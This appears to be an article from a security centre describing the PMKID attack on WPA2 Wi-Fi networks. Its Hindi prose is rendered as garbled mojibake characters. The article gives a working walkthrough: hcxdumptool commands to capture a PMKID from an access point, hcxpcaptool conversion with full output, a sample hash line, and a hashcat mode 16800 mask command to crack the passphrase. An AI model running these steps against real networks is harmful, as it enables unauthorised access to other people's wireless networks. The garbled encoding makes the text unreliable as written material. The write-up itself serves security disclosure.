рд╣реИрд╢рдХрдЯ рдкрд░рд┐рдпреЛрдЬрдирд╛ рдХреЗ рдкреНрд░рддрд┐рднрд╛рдЧрд┐рдпреЛрдВ рдиреЗ WPA2 рд╡рд╛рдпрд░рд▓реЗрд╕ рдорд╛рдирдХ рдХреЗ рд▓рд┐рдП рдПрдХ рдирдпрд╛ рд╣рдорд▓рд╛ рд╡реЗрдХреНрдЯрд░ рдХреА рдЦреЛрдЬ рдХреА, рдЬрд┐рд╕реЗ рдХреНрд▓рд╛рдЗрдВрдЯ рдФрд░ рдкрд╣реБрдВрдЪ рдмрд┐рдВрджреБ рдХреЗ рдмреАрдЪ "рд╣реИрдВрдбрд╢реЗрдХ" рдХреЗ рдХреНрд▓рд╛рд╕рд┐рдХ рдЕрд╡рд░реЛрдзрди рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рдирд╣реАрдВ рд╣реИред рдЗрд╕ рднреЗрджреНрдпрддрд╛ рдХреА рдкрд╣рдЪрд╛рди рдирдП WPA3 рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдХреЗ рд╕рдВрднрд╛рд╡рд┐рдд рд╕реБрд░рдХреНрд╖рд╛ рдореБрджреНрджреЛрдВ рдХреЗ рдЕрдзреНрдпрдпрди рдХреЗ рдПрдХ рднрд╛рдЧ рдХреЗ рд░реВрдк рдореЗрдВ рдХреА рдЧрдИ рдереАред
рдореМрдЬреВрджрд╛ рд╣рдорд▓реЛрдВ рд╕реЗ рдореБрдЦреНрдп рдЕрдВрддрд░ рдпрд╣ рд╣реИ рдХрд┐ рдЗрд╕ рд╣рдорд▓реЗ рдореЗрдВ, рдкреВрд░реЗ 4-рд░рд╛рд╕реНрддрд╛ EAPOL рд╣реИрдВрдбрд╢реЗрдХ рдкрд░ рдХрдмреНрдЬрд╛ рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рдирд╣реАрдВ рд╣реИред RSN IE (Robust Security Network Information Element) рдореЗрдВ рдПрдХ рдирдпрд╛ рд╣рдорд▓рд╛ рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ, рдФрд░ рдЗрд╕рдХреЗ рд╕рдлрд▓ рдкреНрд░рдЬрдирди рдХреЗ рд▓рд┐рдП рдПрдХ рдлреНрд░реЗрдо EAPOL рдкрд░реНрдпрд╛рдкреНрдд рд╣реИред
рд╡рд░реНрддрдорд╛рди рдореЗрдВ, рдпрд╣ рдЬреНрдЮрд╛рдд рдирд╣реАрдВ рд╣реИ рдХрд┐ рдпрд╣ рд╡рд┐рдзрд┐ рдХрд┐рддрдиреЗ рд░рд╛рдЙрдЯрд░реНрд╕ рдХреЗ рд▓рд┐рдП рдХрд╛рдо рдХрд░реЗрдЧреА, рд╕рднреА рдореМрдЬреВрджрд╛ 802.11i / p / q / r рдиреЗрдЯрд╡рд░реНрдХ рдХреЗ рд▓рд┐рдП, рдЬрд┐рд╕рдореЗрдВ рд░реЛрдорд┐рдВрдЧ рдлреАрдЪрд░реНрд╕ рдЪрд╛рд▓реВ рд╣реИрдВ, рдФрд░ рдпрд╣ рдЖрдзреБрдирд┐рдХ рд░реВрдЯрд░реНрд╕ рдХрд╛ рдмрд╣реБрдордд рд╣реИред
рдирдП рд╣рдорд▓реЗ рдХреА рдореБрдЦреНрдп рд╡рд┐рд╢реЗрд╖рддрд╛рдПрдВ:
- рдЧреНрд░рд╛рд╣рдХреЛрдВ рдХреЗ рд▓рд┐рдП рдкреНрд░рддреАрдХреНрд╖рд╛ рдХрд░рдиреЗ рдХреА рдХреЛрдИ рдЖрд╡рд╢реНрдпрдХрддрд╛ рдирд╣реАрдВ рд╣реИ - рдПрдкреА рдкрд░ рд╕реАрдзреЗ рд╣рдорд▓рд╛ рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ;
- рдХреНрд▓рд╛рдЗрдВрдЯ рдФрд░ рдПрдкреА рдХреЗ рдмреАрдЪ рдкреВрд░реНрдг 4-рд╡реЗ рд╣реИрдВрдбрд╢реЗрдХ рдХреЗ рд▓рд┐рдП рдкреНрд░рддреАрдХреНрд╖рд╛ рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рдирд╣реАрдВ рд╣реИ;
- рдИрдПрдкреАрдУрдПрд▓ рдлреНрд░реЗрдо рдХреЗ рдкреБрди: рдкреНрд░рд╕рд╛рд░рдг рдХреА рдХрдореА;
- рдХреНрд▓рд╛рдЗрдВрдЯ рд╕реЗ рдЕрдорд╛рдиреНрдп рдкрд╛рд╕рд╡рд░реНрдб рдХреИрдкреНрдЪрд░ рдХрд░рдиреЗ рдХреА рд╕рдВрднрд╛рд╡рдирд╛ рдХреЛ рд╕рдорд╛рдкреНрдд рдХрд░рддрд╛ рд╣реИ;
- рджреВрд░рд╕реНрде рдХреЗ рджреМрд░рд╛рди EAPOL рдлреНрд░реЗрдо рдХрд╛ рдиреБрдХрд╕рд╛рди / рдХреНрд▓рд╛рдЗрдВрдЯ рдХреЗ рд╕рд╛рде рд╕рдВрдЪрд╛рд░ рдХреА рд╣рд╛рдирд┐ рдХреЛ рдмрд╛рд╣рд░ рд░рдЦрд╛ рдЧрдпрд╛ рд╣реИ;
- рдЧреИрд░-рдЧрддрд┐ рдФрд░ рд░реАрдкреНрд▓реЗрдХрд╛рдЙрдВрдЯрд░ рдореВрд▓реНрдпреЛрдВ рдХреЛ рдареАрдХ рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рдХреА рдХрдореА рдХреЗ рдХрд╛рд░рдг рдЙрдЪреНрдЪ рдЧрддрд┐;
- рдПрдХ рд╡рд┐рд╢реЗрд╖ рдЖрдЙрдЯрдкреБрдЯ рдкреНрд░рд╛рд░реВрдк (pcap, hccapx, рдЖрджрд┐) рдХреА рдХреЛрдИ рдЖрд╡рд╢реНрдпрдХрддрд╛ рдирд╣реАрдВ рд╣реИ - рдХреИрдкреНрдЪрд░ рдХрд┐рдП рдЧрдП рдбреЗрдЯрд╛ рдХреЛ рд╣реЗрдХреНрд╕ рд╕реНрдЯреНрд░рд┐рдВрдЧ рдХреЗ рд░реВрдк рдореЗрдВ рд╕рдВрдЧреНрд░рд╣реАрдд рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред
рд╣рдорд▓реЗ рдХрд╛ рд╡рд┐рд╡рд░рдг
RSN IE рдПрдХ рд╡реИрдХрд▓реНрдкрд┐рдХ рдХреНрд╖реЗрддреНрд░ рд╣реИ рдЬрд┐рд╕реЗ 802.11 рдкреНрд░рдмрдВрдзрди рдХреЗ рднреАрддрд░ рдкрд╛рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред RSN рдХреА рд╡рд┐рд╢реЗрд╖рддрд╛рдУрдВ рдореЗрдВ рд╕реЗ рдПрдХ PMKID рд╣реИред
PMKID рдХреА рдЧрдгрдирд╛ HMAC-SHA1 рдХреЗ рдЙрдкрдпреЛрдЧ рд╕реЗ рдХреА рдЬрд╛рддреА рд╣реИ, рдЬрд╣рд╛рдВ рдХреБрдВрдЬреА PMK рд╣реИ, рдФрд░ рдбреЗрдЯрд╛ рдХрд╛ рдПрдХ рд╣рд┐рд╕реНрд╕рд╛ рдирд┐рд╢реНрдЪрд┐рдд рд╕реНрдЯреНрд░рд┐рдВрдЧ рд▓реЗрдмрд▓ "PMK рдирд╛рдо", рдПрдХреНрд╕реЗрд╕ рдкреНрд╡рд╛рдЗрдВрдЯ рдХреЗ рдореИрдХ рдкрддреЗ рдФрд░ рд╕реНрдЯреЗрд╢рди рдХреЗ рдореИрдХ рдкрддреЗ рдХрд╛ рд╕рдВрдпреЛрдЬрди рд╣реИред
PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)
рдЪреВрдВрдХрд┐ рдкреАрдПрдордХреЗ рд╣рдореЗрд╢рд╛ рдХреА рддрд░рд╣ рдЪрд╛рд░-рд╣рд╛рде рд╡рд╛рд▓реЗ рдИрдПрдкреЙрд▓ рдХреЗ рд╕рдорд╛рди рд╣реИ, рдпрд╣ рдПрдХ рдЖрджрд░реНрд╢ рд╣рдорд▓рд╛ рд╡реЗрдХреНрдЯрд░ рд╣реИред рд╣рдореЗрдВ рдПрдкреА рд╕реЗ рдкрд╣рд▓реЗ EAPOL рдлреНрд░реЗрдо рдореЗрдВ рд╕рднреА рдЖрд╡рд╢реНрдпрдХ рдбреЗрдЯрд╛ рдорд┐рд▓рддреЗ рд╣реИрдВред
рд╣рдорд▓реЗ рдХреЗ рд▓рд┐рдП рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдЙрдкрдХрд░рдгреЛрдВ (рд╡рд░реНрддрдорд╛рди рд╕рдВрд╕реНрдХрд░рдгреЛрдВ) рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реЛрдЧреА:
PMKID рдХреЛ "рд╣рдЯрд╛рдиреЗ" рдХреЗ рд▓рд┐рдП hcxdumptool рдЪрд▓рд╛рдПрдБ:
$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status
start capturing (stop with ctrl+c) INTERFACE:...............: wlp39s0f3u4u5 FILTERLIST...............: 0 entries MAC CLIENT...............: 89acf0e761f4 (client) MAC ACCESS POINT.........: 4604ba734d4e (start NIC) EAPOL TIMEOUT............: 20000 DEAUTHENTICATIONINTERVALL: 10 beacons GIVE UP DEAUTHENTICATIONS: 20 tries REPLAYCOUNTER............: 62083 ANONCE...................: 9ddca61888470946305b27d413a28cf474f19ff64c71667e5c1aee144cd70a69
рдлрд╝рд╛рдЙрдВрдб рдкреАрдПрдордХреЗрдЖрдИрдбреА рдЖрдкрдХреЛ рд╣рдорд▓реЗ рдХреЗ рд╕рдлрд▓ рд╕рдорд╛рдкрди (рдФрд╕рдд 10 рдорд┐рдирдЯ) рдХреА рд╕реВрдЪрдирд╛ рджреЗрдЧрд╛:
[13:29:57 - 011] 89acf0e761f4 -> 4604ba734d4e <ESSID> [ASSOCIATIONREQUEST, SEQUENCE 4] [13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [ASSOCIATIONRESPONSE, SEQUENCE 1206] [13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [FOUND PMKID]
рдЬрд┐рд╕рдХреЗ рдмрд╛рдж рдкреНрд░рд╛рдкреНрдд рдЖрдВрдХрдбрд╝реЛрдВ рдХреЛ рдкрд░рд┐рд╡рд░реНрддрд┐рдд рдХрд░рдирд╛ рдЖрд╡рд╢реНрдпрдХ рд╣реИ:
$ ./hcxpcaptool -z test.16800 test.pcapng
start reading from test.pcapng summary: -------- file name....................: test.pcapng file type....................: pcapng 1.0 file hardware information....: x86_64 file os information..........: Linux 4.17.11-arch1 file application information.: hcxdumptool 4.2.0 network type.................: DLT_IEEE802_11_RADIO (127) endianess....................: little endian read errors..................: flawless packets inside...............: 66 skipped packets..............: 0 packets with FCS.............: 0 beacons (with ESSID inside)..: 17 probe requests...............: 1 probe responses..............: 11 association requests.........: 5 association responses........: 5 authentications (OPEN SYSTEM): 13 authentications (BROADCOM)...: 1 EAPOL packets................: 14 EAPOL PMKIDs.................: 1 1 PMKID(s) written to test.16800
рдЬреЛ рд░реВрдкрд╛рдВрддрд░рдг рдХреЗ рдмрд╛рдж рдирд┐рдореНрди рд░реВрдк рд▓реЗрдЧрд╛:
2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a
рдЬреЛ рдирд┐рдореНрди рдбреЗрдЯрд╛ рдкреНрд░рдХрд╛рд░реЛрдВ рдХреЗ рд╣реЗрдХреНрд╕-рдорд╛рди рд╣реИрдВ:
PMKID*MAC AP*MAC Station*ESSID
рддрдм рдпрд╣ рд╣реИрд╢рдЯреИрдЯ рдЙрдкрдпреЛрдЧрд┐рддрд╛ рдХреЗ рд▓рд┐рдП "рдлрд╝реАрдб" рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдмрдиреА рд╣реБрдИ рд╣реИ (рд╣рд╛рдБ, рдЕрдм рддрдХ рдмрд┐рдирд╛ рдХрд┐рд╕реА рдЬрд╛рдирд╡рд░ рдХреЗ) рдФрд░ рдкрд░рд┐рдгрд╛рдо рдХреА рдкреНрд░рддреАрдХреНрд╖рд╛ рдХрд░реЗрдВ:
$ ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'
рдпрд╣ рддрдХрдиреАрдХ рдХрдо рдкреНрд░рднрд╛рд╡ рдХрд╛рд░рдХреЛрдВ рдХреЗ рдХрд╛рд░рдг рдЕрдзрд┐рдХрд╛рдВрд╢ рд╡рд╛рдпрд░рд▓реЗрд╕ рдЙрдкрдХрд░рдгреЛрдВ рдкрд░ рд╣рдорд▓реЗ рдХреЛ рд╕рд░рд▓ рдФрд░ рддреЗрдЬ рдХрд░рддреА рд╣реИред
рдкреБрдирд╢реНрдЪ: рдпрд╣ рднреЗрджреНрдпрддрд╛ рдореБрдЦреНрдп рд░реВрдк рд╕реЗ рдШрд░ / SOHO рдЙрдкрдХрд░рдгреЛрдВ рдХреЛ рдкреНрд░рднрд╛рд╡рд┐рдд рдХрд░рддреА рд╣реИ, рдХреЙрд░реНрдкреЛрд░реЗрдЯ рд╕реЗрдЧрдореЗрдВрдЯ рдореЗрдВ, рдПрдХ рдирд┐рдпрдо рдХреЗ рд░реВрдк рдореЗрдВ, RADIUS рдХреБрдВрдЬреА рдХреЗ рд╕рд╛рде рдЕрдзрд┐рдХ рд╡рд┐рд╢реНрд╡рд╕рдиреАрдп MGT WPA2 рдПрдВрдЯрд░рдкреНрд░рд╛рдЗрдЬ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред
рд╕реВрдЪрдирд╛ рд╕реБрд░рдХреНрд╖рд╛ рдХреЗрдВрджреНрд░, рдЬреЗрдЯ рдЗрдиреНрдлреЛрд╕рд┐рд╕реНрдЯрдореНрд╕